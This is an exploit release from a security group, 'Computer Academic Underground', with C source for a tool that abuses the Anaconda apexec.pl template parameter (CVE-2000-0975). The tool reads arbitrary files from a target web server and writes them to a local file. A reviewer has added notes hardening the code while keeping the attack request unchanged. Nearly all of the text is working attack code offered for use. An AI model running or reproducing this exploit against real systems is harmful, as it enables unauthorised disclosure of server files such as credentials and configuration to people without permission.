____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Exploit Code ===============/======================================================== Exploit ID: CAU-EX-2004-0003 Release Date: 2004.10.19 Title: anaconda-cp.c Description: Anaconda apexec.pl File Disclosure Exploit Wrapper Tested: [ANACONDA! EXECUTIVE]: [3.2h] [1/31/01] [FOUNDATION DIRECTORY]: [1.10] [03/06/02] Attributes: File Disclosure Exploit URL: http://www.caughq.org/exploits/CAU-EX-2004-0003.txt Author/Email: I)ruid ===============/======================================================== Description =========== This tool connects to the target server on the specified http port, requests a file using Anaconda's apexec.pl template function, then copies the contents of the response into a specified local copy of the requested file. Credits ======= Pestilence is credited with discovering this vulnerability on October 13, 2000. References ========== http://synnergy.net/downloads/advisories/SLA-2000-17.anaconda.txt http://www.securityfocus.com/bid/2338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0975 Product Homepage: http://www.anaconda.net Exploit ======= /* * Anaconda apexec.pl - File Disclosure Exploit Wrapper * 2004.10.19 - I)ruid * * This tool connects to the target server on the specified http * port, requests a file using Anaconda's apexec.pl template * function, then copies the contents of the response into a * specified local copy of the requested file. 
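*/

/*
 * Review notes on this listing (changes from the original build):
 *  - the header names in the #include lines were lost in extraction and
 *    have been restored; "extern int errno;" is gone because <errno.h>
 *    already provides errno (as a macro on modern libcs);
 *  - the request was formatted with an unbounded sprintf() into a
 *    1024-byte stack buffer from an argv string -- now snprintf() with a
 *    length check;
 *  - the gethostbyname() result was copied with sizeof(unsigned long),
 *    which is 8 bytes on LP64 hosts and overruns the 4-byte in_addr --
 *    now copied by sizeof(struct in_addr) after checking the family;
 *  - socket() failure, fopen() failure, short write()s and fwrite()/
 *    fclose() errors were not handled;
 *  - the port is validated instead of being passed through atol().
 * The wire behaviour (the request line and the two path fragments) is
 * unchanged.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <libgen.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define DEBUG 0

/* Request path prefix and suffix.  Both are appended verbatim; these are
 * plain char arrays, not format strings, so "%%" in get_part_2 is two
 * literal percent signs on the wire.  Taken as-is from the original
 * exploit -- do not "fix" them. */
static const char get_part_1[] = "/cgi-bin/apexec.pl?template=";
static const char get_part_2[] = "%%0000.html";

/* Report "what: strerror(errno)" on stderr and exit with the tool's
 * historical failure status (-1). */
static void die_errno(const char *what)
{
    fprintf(stderr, "%s: %s\n", what, strerror(errno));
    exit(-1);
}

/* Parse a decimal TCP port from text.  Returns the port, or 0 on any
 * error (0 is never a valid destination port here). */
static unsigned parse_port(const char *text)
{
    char *end;
    long value;

    errno = 0;
    value = strtol(text, &end, 10);
    if (end == text || *end != '\0' || errno == ERANGE ||
        value < 1 || value > 65535) {
        return 0;
    }
    return (unsigned)value;
}

/* Resolve host (dotted quad first, then a name lookup) into an IPv4
 * socket address with the given port.  Returns 0 on success, -1 after
 * printing the failure on stderr. */
static int resolve_target(const char *host, unsigned port,
                          struct sockaddr_in *out)
{
    struct in_addr address;

    memset(out, 0, sizeof *out);

    if (inet_pton(AF_INET, host, &address) != 1) {
        struct hostent *h = gethostbyname(host);

        if (h == NULL || h->h_addr_list[0] == NULL) {
            fprintf(stderr, "%s: host lookup failed\n", host);
            return -1;
        }
        /* Only copy when the record really is a 4-byte IPv4 address;
         * the copy length is the destination size, never a guess. */
        if (h->h_addrtype != AF_INET ||
            h->h_length != (int)sizeof address) {
            fprintf(stderr, "%s: no IPv4 address\n", host);
            return -1;
        }
        memcpy(&address, h->h_addr_list[0], sizeof address);
    }

    out->sin_family = AF_INET;
    out->sin_addr = address;
    out->sin_port = htons((unsigned short)port);
    return 0;
}

/* Format the bare request line ("GET <path>\n", no HTTP version and no
 * headers, exactly as the original sent it) into out.  Returns the
 * request length, or -1 if it would not fit in outlen bytes.
 *
 * remotefile is inserted as typed on the command line: nothing here
 * URL-encodes it, so the caller must pre-encode anything the server
 * would otherwise interpret (spaces, '&', '#', '%', ...). */
static int build_request(char *out, size_t outlen, const char *remotefile)
{
    int n = snprintf(out, outlen, "GET %s%s%s\n",
                     get_part_1, remotefile, get_part_2);

    if (n < 0 || (size_t)n >= outlen) {
        return -1;
    }
    return n;
}

/* Write all len bytes of buf to sock, retrying on short writes and
 * EINTR.  Returns 0, or -1 with errno set by write(). */
static int send_all(int sock, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(sock, buf, len);

        if (n == -1) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/* Copy everything the server sends, byte for byte, into localfile until
 * the peer closes the connection.  The file is created or truncated, and
 * its contents are whatever the server chose to send (any HTTP headers
 * included, nothing is parsed or size-limited) -- treat it as untrusted
 * data.  Returns 0, or -1 after reporting the failure on stderr. */
static int save_response(int sock, const char *localfile)
{
    FILE *out;
    char chunk[4096];
    ssize_t n;

    out = fopen(localfile, "w");
    if (out == NULL) {
        fprintf(stderr, "%s: %s\n", localfile, strerror(errno));
        return -1;
    }

    while ((n = read(sock, chunk, sizeof chunk)) > 0) {
        if (DEBUG > 2) {
            fwrite(chunk, 1, (size_t)n, stdout);
        }
        if (fwrite(chunk, 1, (size_t)n, out) != (size_t)n) {
            fprintf(stderr, "fwrite: %s\n", strerror(errno));
            fclose(out);
            return -1;
        }
    }
    if (n == -1) {
        fprintf(stderr, "read: %s\n", strerror(errno));
        fclose(out);
        return -1;
    }

    /* fclose() flushes; a failure here means the file is incomplete. */
    if (fclose(out) != 0) {
        fprintf(stderr, "fclose: %s\n", strerror(errno));
        return -1;
    }
    return 0;
}

/*
 * Entry point.
 *
 * argv[1]  remote host (IPv4 literal or name)
 * argv[2]  remote TCP port (1-65535)
 * argv[3]  file to request through the apexec.pl template parameter,
 *          inserted into the query string without encoding
 * argv[4]  local file to (over)write with the raw server response
 *
 * Exits 0 on success; every failure path exits -1 (status 255), as the
 * original did.
 */
int main(int argc, char *argv[])
{
    const char *remotehost;
    const char *remoteport;
    const char *remotefile;
    const char *localfile;
    struct sockaddr_in addr;
    char http_command[1024];
    unsigned port;
    int commandlen;
    int sock;

    if (argc < 5) {
        /* The argument placeholders were lost in extraction; restored
         * from the argv mapping below. */
        fprintf(stderr,
                "Usage: %s <remotehost> <remoteport> <remotefile> <localfile>\n",
                basename(argv[0]));
        exit(-1);
    }
    remotehost = argv[1];
    remoteport = argv[2];
    remotefile = argv[3];
    localfile = argv[4];

    /* Output header (unchanged text). */
    printf("apexec.pl File Disclosure Exploit\n");
    printf("I)ruid \n\n");
    printf("Attempting retrieval of %s from %s:%s\n",
           remotefile, remotehost, remoteport);

    port = parse_port(remoteport);
    if (port == 0) {
        fprintf(stderr, "%s: not a valid TCP port (1-65535)\n", remoteport);
        exit(-1);
    }

    /* Build the request before touching the network so an over-long
     * remotefile is rejected without opening a connection. */
    commandlen = build_request(http_command, sizeof http_command, remotefile);
    if (commandlen < 0) {
        fprintf(stderr, "remotefile too long (request limited to %zu bytes)\n",
                sizeof http_command - 1);
        exit(-1);
    }

    if (resolve_target(remotehost, port, &addr) != 0) {
        exit(-1);
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == -1) {
        die_errno("socket");
    }
    if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
        die_errno("connect");
    }

    if (DEBUG) {
        printf("Sending GET request: %s", http_command);
    }
    if (send_all(sock, http_command, (size_t)commandlen) != 0) {
        die_errno("write");
    }
    if (DEBUG > 2) {
        int x;

        /* Cast to unsigned char so bytes >= 0x80 do not print as
         * sign-extended "\xffffff.." sequences. */
        for (x = 0; x < commandlen; x++) {
            printf("\\x%02x", (unsigned char)http_command[x]);
        }
        printf("\n");
    }

    if (save_response(sock, localfile) != 0) {
        close(sock);
        exit(-1);
    }

    close(sock);
    return 0;
}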